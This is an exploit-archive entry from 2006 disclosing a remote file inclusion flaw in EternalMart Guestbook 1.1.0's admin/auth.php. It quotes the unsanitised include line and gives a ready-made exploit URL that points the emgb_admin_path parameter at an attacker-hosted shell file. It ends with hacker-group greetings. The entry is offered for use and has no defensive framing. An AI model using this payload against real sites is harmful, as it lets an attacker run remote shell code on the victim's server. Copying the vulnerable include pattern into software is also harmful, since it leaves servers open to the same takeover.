[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : EternalMart Guestbook 1.10 (admin/auth.php) Remote Inclusion Vuln
# Published : 2006-12-22
# Author : mdx
# Previous Title : KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability
# Next Title : 3editor CMS <= 0.42 (index.php) Local File Include Vulnerability
******************************************************************************************************
*EternalMart Guestbook 1.1.0********* [emgb_admin_path] ************************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx *
*****************************************************************************
+Files :
+admin/auth.php? *
*****************************************************************************
+code : *
+ *
+ include("$emgb_admin_path/auth_func.php"); *
+ *
+ download link : http://www.vanta.ru/script/info.php?id=230&clas=0 *
*********************************************************************************************
+ Exploit : *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/auth.php?emgb_admin_path=http://mdxshell.txt? +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
? Hi , The_bat_hacker , How are you ? ;=) *
? *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
? *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
******************* *
******************* KORKULARINIZ SADECE KABUSLARINIZDIR..
******************* *
******************* Turkish Hacker by mdx *
******************* *
******************* Korkmak Kurtulmak Degildir.
******************* *
**********************************************************************************************
# www.Syue.com [2006-12-22]